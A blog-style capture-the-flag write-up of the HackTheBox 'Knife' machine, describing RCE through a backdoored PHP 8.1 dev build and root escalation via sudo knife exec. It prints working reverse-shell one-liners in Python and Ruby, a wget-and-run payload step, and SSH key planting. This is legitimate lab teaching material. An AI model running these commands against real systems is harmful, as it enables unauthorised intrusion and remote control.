HackTheBox – Knife

Welcome to my first hackthebox write-up, in this first blog entry I’m gonna show you the steps to resolve this easy machine from this amazing platform. Knife is a good example of easy machine for those who are taking their first experience with the boot2root challenges because it involves a lot of enumeration (the vulnerability is not being shown in front of your eyes when you starts the enumeration phase) and the privilege escalation phase is a common way to escalate in these challenges.

Initial enumeration

As always in the beginning of any boot2root challenge, the first we need is to enumerate which services are opened in the target. The nmap is surely the best tool you can use. After adding a new entry to the /etc/hosts file, we usually start the enumeration launching nmap with a simple set of arguments:

So… port 80 and 22 opened, it’s not a big surprise because the linux-based machines usually have this few ports opened. The first service we focus will be almost always the HTTP server so let’s start with port 80.

After several enumeration we did not identify nothing interesting. The subdomain enumeration was neither successful.

Then, we got the PHP version in the server response. The version felt a little strange at first sight because it is not the usual versions you may find in a web assessment.

Searching for exploits I find a very interesting one:

Remote code execution

The exploit works well and we got a very simple RCE in the machine through the vulnerable PHP version.
Just to understand the exploit, it was a backdoor installed in an early version of the 8.1 branch in March 2021. The backdoor is triggered with a parameter in the request header as shown in the following image.

We were facing some problems to get the reverse shell because the typical linux reverse tcp commands didn’t work. I finally got the reverse shell using this approach:

  • Create a script with the common Python reverse TCP commands.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • Download this file into the victim using the remote command execution.
wget -O /dev/shm/rev.sh
  • Execute the payload.
bash /dev/shm/rev.sh

Once received the reverse connection, the first is to upgrade the shell by the addition of a new authorized key and initialize a SSH session. The user is ‘james’, we previously identified the user name with a simple ‘whoami’. We got the user flag with this SSH session as ‘james’.

Privilege escalation

One of the first things that anyone verifies when the privilege escalation is started, is if the user has the possibility to execute any command with sudo. In this occasion it was very clear that this had to be the path to perform the escalation.

Well, the user ‘james’ is able to execute the tool ‘knife’ as root without the need to enter the user’s credentials.

This tool is documented here. With a little of search, the function ‘exec’ is identified which allows us to execute ruby code. More details in the official knife documentation page.

At this moment we had all the pieces to escalate privilege, it was only necessary to put all them together executing the following command to get a reverse tcp shell in the attacker machine.

sudo knife exec -E 'exit if fork;c=TCPSocket.new("",8888);loop{c.gets.chomp!;($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}'

Posted on